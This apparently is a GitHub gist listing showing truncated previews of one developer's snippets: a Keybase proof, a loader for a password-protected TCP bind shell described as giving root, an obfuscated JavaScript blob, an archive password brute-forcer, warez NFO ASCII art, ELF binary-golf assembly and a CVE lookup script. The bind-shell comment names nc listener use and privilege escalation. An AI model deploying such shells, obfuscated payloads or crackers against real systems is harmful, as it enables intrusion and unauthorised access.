I hereby claim:
- I am yuudev on github.
- I am yuu (https://keybase.io/yuu) on keybase.
- I have a public key ASDQIydjpVlQx_E5naVLU96qDEUSlQvDim0CIZeSl4atnwo
To claim this, I am signing this object:
| import binascii | |
| import subprocess | |
| t = [ "0000","005f","0100","015f","0200", | |
| "0201","0300","0400","0500","056a", | |
| "0600","0800","0853","0900","0d00", | |
| "1000","1100","1400","1800","1900", | |
| "1b00","2000","2100","2900","2e73", | |
| "2e74","2f62","2f73","31c0","3800", | |
| "3801","3b0f","3e00","4000","4831", |
| import binascii, subprocess | |
| ###################################################### | |
| # Shinji 3 is a proof of concept password protected # | |
| # TCP Bind Shell binary. This one only works on # | |
| # localhost, but you could modify to send /bin/sh # | |
| # wherev, or use for local priv esc (: # | |
| # # | |
| # First create a listener $ nc -lvp 4444 # | |
| # Then run the loader + binary # | |
| # Then type the password 'ayy!' to become root. # |
| <html><script>/*. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */ | |
| ci="nVuY3Rpb24gZ";io="O319ZCgpOw==";jk="jMmhwYm1wcE1";/* . */mm="lKC0tXzB4OW"; | |
| jw="VuY3Rpb24oX";og="yIF8weDVlNT";/*. . . . . . . . . . . .*/ps="GNITTZMeTly"; | |
| cn="1cm4gXzB4Mm";d5="MHhjZWRkKCcw";/*. . . . . . . . . . . */df="MHgyNjQ1NDV"; | |
| re="HgyNjQ1NDVbJ";rm="vbihfMHgyODQ";/*. . */k1="NlZGQoJzB4M";rp="zB4MTE0ZDEw"; | |
| rv="icpXTtfMHgx";/*. . . . . . . . . . . .*/ij="E0PV8weGVkZ";k5="xfMHhjZWRkK"; | |
| k7="NTA3MCkrYXR";/* . . */k8="I3YjAzW18weG";k9="HgyODQ2MjE9";we="ihfMHg5ZTM0"; | |
| wh="ZD1mdW5jdGl";/*. . .*/ag="XIgXzB4Y2Vk";sn="NjIxXTtyZXR";ww="8weDExNGQxMD"; | |
| k6="Cgpe3ZhciBf";/* . . .*/xz="UzNDYxKXtfM";zz="2MjEsXzB4NT";g9="BjMzhkKXtfM"; | |
| tg="1mdW5jdGlvb";/*. . . . . . . . . . . */tk="h2YXIgXzB4M";so="IgXzB4MmZmOG"; |
| import subprocess | |
| import sys | |
| import os | |
| archive = sys.argv[2] | |
| passfile = sys.argv[1] | |
| f = open(passfile, "r") | |
| for line in iter(f): | |
| trypass = line.strip('\n') |
| Super work in progress. These are 80 column wide text effects from old | |
| pirate groups, BBS's, and elsewhere. | |
| Marked with --- at the beginning marks visually similar or related elements | |
| ---[ Ratings ] | |
| [β β β β β β β β β β ] 10/10 | |
| ββββββββββ 7/10 | |
| [β β β β β β ----] |
| This is a collection of NFO templates from various PSP Crack / Warez Groups | |
| --- 4Fun | |
| ββ βββββ ____________________ __________ βββββ ββ | |
| ββ ββββββββ / | \_ _____/ | \ \@TiLK ββββββββ ββ | |
| ββββ βββββ / | || __) | | / | \ βββββ ββββ | |
| βββ βββββ / ^ / \ | | / | \ βββββ βββ | |
| ββ ββββ \____ |\___ / |______/\____|__ / ββββ ββ | |
| βββββ ββ |__| \/ \/ ββ βββββ |
I hereby claim:
To claim this, I am signing this object:
| BITS 64 | |
| org 0x100000000 ; Where to load this into memory | |
| ;----------------------+------+-------------+----------+------------------------ | |
| ; ELF Header struct | OFFS | ELFHDR | PHDR | ASSEMBLY OUTPUT | |
| ;----------------------+------+-------------+----------+------------------------ | |
| db 0x7F, "ELF" ; 0x00 | e_ident | | 7f 45 4c 46 | |
| _start: mov al,0x3c ; 0x04 | ei_class | | b0 | |
| ; 0x05 | ei_data | | 3c |
| ; 84 byte LINUX_REBOOT_CMD_POWER_OFF Binary Golf | |
| BITS 64 | |
| org 0x100000000 | |
| ;---------------------+------+------------+------------------------------------------+-----------------------------+----------+ | |
| ; CODE LISTING | OFFS | ASSEMBLY | CODE COMMENT | ELF HEADER STRUCT | PHDR | | |
| ;---------------------+------+------------+------------------------------------------+-----------------------------+----------+ | |
| db 0x7F, "ELF" ; 0x0 | 7f454c46 | PROTIP: Can use magic as a constant ;) | ELF Magic | | | |
| _start: ;------|------------|------------------------------------------|-----------------------------|----------| | |
| mov edx, 0x4321fedc ; 0x04 | badcfe2143 | Moving magic values... | ei_class,ei_data,ei_version | | | |
| mov esi, 0x28121969 ; 0x09 | be69191228 | into their respective places | unused | | |
| import urllib.request, json, sys, textwrap | |
| # Run like | |
| # python3 pubsploit.py CVE-2017-0143 | |
| def cveSearch(cve): | |
| with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url: | |
| data = json.loads(url.read().decode()) | |
| try: | |
| if data['cvss']: | |
| print("{} | CVSS {}".format(cve,data['cvss'])) |